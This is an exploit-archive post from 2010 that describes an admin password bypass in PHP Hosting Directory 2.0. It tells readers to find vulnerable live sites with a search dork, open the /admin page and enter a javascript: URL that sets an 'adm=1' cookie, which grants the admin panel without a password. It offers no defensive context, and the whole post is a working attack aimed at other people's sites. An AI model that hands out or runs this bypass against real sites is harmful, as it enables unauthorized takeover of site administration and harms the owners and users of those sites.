PHP Hosting Directory 2.0 Admin Password Bypass Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP Hosting Directory 2.0 Admin Password Bypass Vulnerability
# Published : 2010-10-09
# Author : ruiner_blackhat
# Previous Title : Feindura File Manager 1.0(rc) Remote File Upload
# Next Title : VideoDB <= 3.0.3 Multiple Remote Vulnerabilities

-----------------------------------------------------------------------                                                                  
   ####            ##       ##                                     
   ####o           ##                                             
   ####X   .@##%   ##@@#@   ##  #@  @#   @##@   ###%##X   X##@     
   ##@##   ##@X#%  ##@X##%  ##  ##  ##  ##X@##  ###X@##  o##@##    
  o#  ##   ##  ##  ##  ###  ##  X#  ##  ## o##  ###  ##  @## ##%   
  %#  ##   ##X     ##  ###  ##   #  #@     X##  ###  ##  ###X###   
  ##  ##   X##@    ##  ###  ##   #X #X    %###  ###  ##  #######   
  ##  @#o    ###   ##  ###  ##   #@%#o  @#o%##  ###  ##  ### 
  ######X     ##@  ##  ###  ##   %###   ##  ##  ###  ##  ### ###   
  ##X.@#@  #  ###  ##  ###  ##   o###   ##  ##  ###  ##  @##o##@   
  #@   ##  #@X##X  ##  ###  ##    ###   ##X@##  ###  ##   ##@##    
  #X   ##   @##%   ##  ###  ##   X##%   %#@@##  ###  ##    ###X    
-----------------------------------------------------------------------


-----------------------------------------------------------------------
-----------------------------------------------------------------------
ByPass PHP Hosting Version 2
-----------------------------------------------------------------------
-----------------------------------------------------------------------

-----------------------------------------------------------------------
# Exploit Title: [Php Hosting Admin Bypass]
# Date: [2010.10.10]
# Author: [ruiner_blackhat]
# Version: [Versin 2]
# My Group Web: [www.ashiyane.org/forums]
-----------------------------------------------------------------------
Hi
With this exploit you how to bypass the admin panel will hear
php hosting versin 2
-----------------------------------------------------------------------
Initially following dork in your searches:

Dork: "powered by PHP Hosting Directory 2.0"

After selecting one of the sites compiled by the admin panel.for example:

site.com/admin

Do not write anything in the password.
Enter the code below url and press enter.

javascript:document.cookie = "adm=1; path=/";

After being loaded with the error page and check back to refresh and
enter the portal panel Admin.
-----------------------------------------------------------------------

GoodLucK ;) 

http://www.ashiyane.org/forums